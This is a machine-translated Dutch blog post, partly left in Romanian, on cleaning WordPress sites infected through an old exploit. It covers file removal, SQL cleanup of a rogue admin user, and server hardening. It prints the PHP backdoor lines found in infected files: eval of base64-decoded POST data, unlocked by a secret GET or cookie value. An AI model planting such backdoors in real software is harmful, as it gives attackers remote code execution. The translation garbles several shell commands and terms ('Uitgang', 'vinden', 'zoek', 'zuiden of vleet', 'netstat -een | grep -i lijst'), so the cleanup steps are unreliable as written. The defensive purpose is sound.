Voordat je dit bericht leest, moet je het zien het bericht hier, om iets te begrijpen. :)
Ik heb in verschillende bestanden van de blogs op stealthsettings.com codes gevonden die vergelijkbaar zijn met de onderstaande codes, die verschenen als gevolg van een infectie met misbruik van WordPress.:
<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘bestand’])); Uitgang; } ?>
En
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘bestand’])); Uitgang; } ?>
In het bovenstaande geval gaat het om het bestand xmlrpc.php van de Slaperig, maar op één grep op de server is te zien dat er nogal wat van dit soort codes in de bronnen staan.
Geïnfecteerde bestanden opschonen:
Ooookkkkyouak
1. De beste oplossing, nadat deze klaar is back -up- en de database opgeschoond, het is sa VERWIJDEREN de bestanden van WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.
Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.
./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘bestand’])); Uitgang; } ?><?php get_header(); ?>
2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.
find . -name “*_new.php”
find . -name “*_old.php”
find . -name “*.jpgg”
find . -name “*_giff”
find . -name “*_pngg”
find . -name “wp-info.txt”
3. in /tmp , zoek naar en verwijder mappen zoals tmpYwbzT2
SQL-opschoning :
1. in de tabel de tabel WP_OPTIONS kijk of het bestaat en verwijder de regels: interne_links_cache,, rss_f541b3abd05e7962fcab37737f40fad8 En wordpress_opties.
2. Ga ook in wp_options naar actieve_plug-ins en verwijder, als die er is, een plug-in die eindigt op een van de extensies *_new.php, *_old.php, *.jpgg, *.giff, *.pngg of als het een andere verdachte extensie is, controleer dit dan zorgvuldig.
3. In de tabel wp_gebruikers, kijk of er een gebruiker is die niets rechts van hem heeft geschreven, in de kolom gebruiker_leukenaam. Verwijder deze gebruiker, maar onthoud het nummer in de ID-kolom. Deze gebruiker gebruikt waarschijnlijk 'WordPress' als gebruiker_login en het lijkt erop dat het is gemaakt op de datum 00:00:00 0000-00-00.
4. Ga naar de tafel wp_usermeta en verwijder alle regels die bij de bovenstaande ID horen.
Nadat u deze SQL-opschoning hebt uitgevoerd, deactiveert en activeert u vervolgens een plug-in. (op de blog –> Dashboard –> Plug-ins)
Serverbeveiliging:
1. Kijk welke mappen en bestanden "beschrijfbaar” (chmod 777) en probeer een chmod waardoor ze op geen enkel niveau meer kunnen schrijven. (chmod 644 bijvoorbeeld)
vinden . -perm -2 –ls
2. Kijk welke bestanden de bit instellen zuiden of vleet . Als u deze bestanden niet gebruikt, zet ze dan aan chmod 0 of verwijder het pakket dat ze bevat. Ze zijn erg gevaarlijk, omdat ze uitvoeren met de privileges "groep"Of"wortel' en niet met de rechten van de normale gebruiker die dat bestand uitvoert.
zoek / -type f -perm -04000 -ls
zoek / -type f -perm -02000 -ls
3. Controleer welke poorten open zijn en probeer de poorten die niet in gebruik zijn te sluiten of te beveiligen.
netstat -een | grep -i lijst
Dat is het zo'n beetje. Ik zie dat sommige blogs zijn verboden door Google Zoeken en anderen zeggen "Goed gedaan!!!" . Nou, ik zou het voor hen hebben gedaan... maar wat zeg je ervan als Google begint met verbieden alle sites wie wel Ik ben aan het spammen en packs van trojans (Trojan.Clicker.HTML) in cookies?
1 dacht aan "WordPress Exploit – Het reinigen van virusbestanden, SQL en serverbeveiliging.”